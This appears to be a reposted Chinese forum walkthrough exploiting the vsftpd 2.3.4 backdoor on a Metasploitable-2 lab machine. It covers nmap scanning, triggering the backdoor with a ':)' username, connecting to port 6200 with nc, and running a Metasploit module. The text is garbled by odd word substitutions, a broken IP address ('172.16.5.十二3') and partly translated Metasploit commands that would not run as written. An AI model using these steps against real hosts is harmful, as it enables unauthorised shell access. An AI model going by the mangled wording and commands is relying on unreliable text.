华人澳洲中文论坛

热图推荐

    vsftp2.3.4(笑脸后门破绽)

    [复制链接]

    2023-3-2 09:21:31 23 0

    vsftp2.3.4(笑脸后门破绽)
    试验环境:
    攻打机:kali2.0 IP:172.16.5.十二3
    靶机:measploitable-2-linux IP:172.16.5.182




    1.首先两台电脑之间必需是需互通讯的 ping检测靶机是不是存活


    2.使用nmap对指标靶机进行办事及版本号扫描
    #nmap -sV -T4 -n 172.16.5.182


    知道了有这个2.3.4 咱们就要激活它的后门 这里有两种办法(手动和msf模块)
    办法1:使用ftp进行衔接,用户名前面加之一个:)的符号,明码随便便可


    这个时分就会激活一个6200的前面端口,咱们只需求使用nc或者telnet衔接便可,假如不肯定是否开启了6200端口咱们激活当前能够在扫一下整个的端口
    #nmap -sV -p1-60000 172.16.5.182
    确认之落后行衔接(个别激活了都会有6200,这里只是为了测试一下)
    #nc 172.16.5.182 6200


    办法二:使用模块激活
    1.首先启动msf管制台
    #msfconsole
    #search 2.3.4


    #use破绽利用/UNIX/FTP/vsftpd_234_backdoor
    #show选项 查看选项


    #set RHOSTS 172.16.5.182
    #run运转


    3.最初试验完结封闭虚构机

    发表回复

    您需要登录后才可以回帖 登录 | 立即注册

    返回列表 本版积分规则

    :
    中级会员
    :
    论坛短信
    :
    未填写
    :
    未填写
    :
    未填写

    主题44

    帖子54

    积分252

    图文推荐